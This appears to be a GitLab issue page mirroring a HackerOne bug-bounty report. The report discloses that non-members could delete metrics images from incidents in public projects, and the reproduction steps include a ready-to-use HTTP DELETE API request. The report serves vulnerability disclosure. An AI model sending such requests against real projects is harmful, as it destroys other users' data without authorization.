Skip to content

Any gitlab user can Delete all metrics images from incidents without permissions

HackerOne report #1107281 by ashish_r_padelkar on 2021-02-19, assigned to @ngeorge1:

Report | How To Reproduce

Report

Summary

Hello,

It is possible to delete all metrics images from incidents for non members of the public projects without any permissions. When you browse to any incident metrics images , you wont see delete option for metrics images. However, It is possible for any guest user to delete these metric images using this vulnerability!

Pre-requisites.

Metrics images are only available on issue of Incident types. You need to create issue with type as Incident

Steps to reproduce

  1. Login as guest user and go to any public project Incident metrics image. For eg, https://gitlab.com/<NameSpace>/<ProjectName>/-/issues/<ID> and click on Metrics tab!.

  2. You wont see Delete option because you dont have any permission to delete this image.

  3. Just form a request like below.

DELETE /api/v4/projects/[REDACTED]/issues/5/metric_images/44 HTTP/1.1  
Host: gitlab.com  
Connection: close  
Accept: application/json, text/plain, */*  
X-CSRF-Token: <Replace_your_csrf_Token>  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36  
X-Requested-With: XMLHttpRequest  
Origin: https://gitlab.com  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://gitlab.com/gitlabadminuser/mvn-example/-/issues/2  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en;q=0.9  
Cookie: <Replace_Your_Cookies>

You need to supply Project ID, Issue ID and Metrics image ID in above request. In above eg, 23887195 is the project ID, 5 is the issue ID and 44 is the Metric image ID.

4.This will delete the metric image from issue although you dont have access to do so!

  1. This way, you can delete all the public metrics images even if you dont have any access to the project!
What is the current bug behavior?

Non members can delete all the public metrics images without permissions!

What is the expected correct behavior?

Only reporters(or developer) should be able to delete the metrics images within their own projects.

Output of checks

This bug happens on GitLab.com

Regards,
Ashish

Impact

Any gitlab user can potentially delete all the public metric images from incidents without permission

How To Reproduce

Please add reproducibility information to this section:

Edited by Costel Maxim